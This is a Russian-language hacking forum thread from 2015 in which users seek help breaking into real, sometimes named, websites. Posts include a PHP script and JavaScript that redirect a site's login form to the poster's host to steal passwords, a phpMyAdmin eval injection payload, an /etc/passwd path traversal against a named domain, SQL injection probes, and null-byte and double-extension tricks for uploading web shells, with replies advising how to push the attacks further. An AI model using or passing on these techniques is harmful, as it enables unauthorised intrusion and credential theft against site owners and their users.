Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Как составить запрос в sqlmap, чтобы он брал строку из файла и проверял каждую персонально без обращение к google? аналог
    python sqlmap.py - g
     
  2. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    ocheretko, Сервер банит IP. О таком надо предупреждать.
     
  3. smak

    smak New Member

    Joined:
    29 Sep 2010
    Messages:
    34
    Likes Received:
    0
    Reputations:
    0
    можно вопрос нашел уязвимый сайт , там blind sql injection
    он медленно подбирает таблицы видимо вслепую) поставил для перебора количество потоков равным 10
    current user is dba :true (база оракле)
    пытаюсь запустать скл шелл пишет operation system shell functionality not yet implemented for oracle)
    чтото можно сделать?) ато там баз много и юзеров баз много до пенсии будет перебирать )
     
  4. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Нашел активную xss на сайте ,пытаюсь красть логи таким способом,но так не получается почему то,хотя когда копирую их сайт и заливаю на свой хостинг то все поллучается,есть ли другой способ красть пароли из POST запросов?
    Вот мой base.php
    Code:
    <?
    $login = $_POST['username'];
    $pass = $_POST['password'];
    $file = "log.txt";
    $fop = fopen("$file","a+");
    fwrite($fop,"$login;$pass\n");
    fclose($fop);
    ?>
    
    Вот сам submit
    
    <form method="post" autocomplete="off" id="lsform" action="member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;infloat=yes&amp;lssubmit=yes" onsubmit="return lsSubmit();">
    
    И так обращяюсь к submit.
    document.getElementById('lsform').action="http://мойхост.ru/base.php?";
     
    #484 nik1201, 18 Aug 2015
    Last edited by a moderator: 19 Aug 2015
  5. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    Здравствуйте!! Есть доступ к phpMyAdmin - 2.11.8.1deb5+lenny9
    server_databases.php?pos=0&dbstats=0&sort_by="]) OR eval($_REQUEST[cmd]); //&sort_order=desc&token=a327a405644acbcce02edb41461a58c9&cmd=phpinfo();
    Сплоит не работает , ответ
    SQL-запрос:

    SELECT `information_schema`.`SCHEMATA` . *
    FROM `information_schema`.`SCHEMATA`
    GROUP BY BINARY `information_schema`.`SCHEMATA`.`SCHEMA_NAME`
    ORDER BY BINARY `"]) OR eval($_REQUEST[cmd]); //` DESC

    Ответ MySQL:
    #1054 - Unknown column '&quot;]) OR eval($_REQUEST[cmd]); //' in 'order clause'
    как раскрутить помогите и сильно не ругайте я только начинаю.
     
  6. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Как выглядит XSS и где она?
    Какую CVE вы хотите проэксплуатировать? Также, вы можете выполнять стандартные SQL запросы, в том числе и LOAD DATA LOCAL INFILE.
     
    #486 randman, 19 Aug 2015
    Last edited: 19 Aug 2015
  7. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    Мне нужно залить шелл на сайт.. В PMA Нет привилегий..
     
  8. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    51
    Likes Received:
    21
    Reputations:
    11
    Code:
    http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php?filesrc=../../../../etc/passwd
    Подскажите как можно обойти.
     
  9. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    Code:
    http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php
    404 как бэ, да и плюс http://bit.ly/1J4XXyF уже сломали переломали
     
  10. Pro100Nyan

    Pro100Nyan New Member

    Joined:
    15 Mar 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Что то есть?
    Code:
    http://riot.mail.ru/info/news/index.php?show=dat&date=12082015'
    
     
  11. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    Что можно с этого поиметь...
    • exception 'Exception' with message 'Disabled' in /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_theme.php:1019 Stack trace: #0 [internal function]: template_preprocess_theme_wallet_info(Array, 'theme_wallet_in...') #1 /var/www/vhosts//includes/theme.inc(710): call_user_func_array('template_prepro...', Array) #2 /tmp/tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u54jkaA.php(25): theme('theme_wallet_in...') #3 /var/www/vhosts//themes/engines/phptal/PHPTAL.php(675): tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u54jkaA(Object(PHPTAL), Object(PHPTAL_Context)) #4 /var/www/vhosts//themes/engines/phptal/phptal.engine(86): PHPTAL->execute() #5 /var/www/vhosts//includes/theme.inc(738): phptal_render_template('sites/all/modul...', Array) #6 /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_room.php(1273): theme('apparat_select') #7 /var/www/vhosts//sites/all/modules/custom/casino/casino.module(318): ctrl_room->http_apparat(Array) #8 [internal function]: casino_menu_callback('room', 'apparat') #9 /var/www/vhosts//includes/menu.inc(350): call_user_func_array('casino_menu_cal...', Array) #10 /var/www/vhosts//index.php(53): menu_execute_active_handler() #11 {main}
    • There is a problem with the phptal theme engine Please refer to the documentation on the PHPTAL project page.
     
  12. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    Есть сайт на Drupal в загрузку картинок заливаю shell.php%00ipg заливается.Пробовал ище в коментах exif мини-шелл прописать. Но меняет имя файла, иду по адресу файла открываю и ничего не происходит.
    Как я понял стоит imagecache drupal можна вообще таким способом залить шелл или мини-шелл?
    Ище фильтрация на сайте
    Emphasized <em>Emphasized</em> Emphasized
    Strong <strong>Strong</strong> Strong
    Cited <cite>Cited</cite> Cited
    Coded text used to show programming source code <code>Coded</code> Coded
    Character Description You Type You Get
    Ampersand &amp; &
    Greater than &gt; >
    Less than &lt; <
    Quotation mark &quot; "
     
  13. CluboK

    CluboK New Member

    Joined:
    26 Aug 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Не получается залить шелл .
    Вообщем есть админка на сайте.Админка самописная.
    Картинки можно заливать .jpg .png .gif ,остальные расширения нельзя, выдаёт ошибки которые появляются прямо в самой админке .
    Warning: Unsupported image type in /home/*******/*******.ru/admin/gdResizer.php on line 75

    Warning: Division by zero in /home/*******/*******/admin/gdResizer.php on line 227

    Warning: Division by zero in /home/*******/*******.ru/admin/gdResizer.php on line 228

    Warning: imagecreatetruecolor(): Invalid image dimensions in /home/*******/*******.ru/admin/gdResizer.php on line 241

    Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in /home/*******/*******.ru/admin/gdResizer.php on line 250

    Warning: Unsupported image type in /home/*******/*******.ru/admin/gdResizer.php on line 107
    Пытаюсь залить шелл с расширением .jpg или .png или .gif тоже ошибки .
    Пробую Shell.php.jpg не катит,даже с %0 .
    Пробую через Image Manager,выбираю файл shell.php,пишет файл загружен,но его там нет .
    Пробовал даже .htacces залить,и то не помогает :( .

    Есть возможность писать отзывы .
    Пишу в строку "Автор" - '(кавычку,одинарную),пишу текст,буква d . Вылезает это You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd','2015-08-26 16:58:08')' at line 1 .
    А что дальше с SQL делать не знаю . Остальные запросы блокирует . Видимо некоторые символы блокирует .
    На заметку : сайт на .html .

    Помогите,а то уже нет сил .
     
  14. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Есть sql иньекция - раскручивайте. Может быть будут права через базу залить шелл.
    Ваш загружаемый файл обрабатывается с помощью библиотеки GD - библиотека php для работы с графическими файлами. Она создает новое корректное изображение с уже существующего. Думаю не получится загрузить другой файл кроме картинки. Просто на сайте нет обработчика ошибок, и включен вывод ошибок
    То, что сайт на html ничего не значит. Если Вы получили сообщение об ошибке mysql уже заслуживает внимание и может рассматриваться как потенциальная уязвимость.

    P.S. И дай Вам бог сил. В нашей работе - главное терпение :)
     
  15. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
  16. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Возможно ли раскрутить Фрагментированную SQL инъекцию
    Отсутствие фильтрации символа обратного слэша \
    http://fortunae-filius.ru/reg.htm
     
  17. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    sqmap -m путь в файлу
     
  18. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    опробуйте pas
     
    _________________________
    SaNDER likes this.
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Тут pas не поможет, это php расширение интерпретируется как html код, нужно пробывать играться с расширением или путь выше искать...
     
    _________________________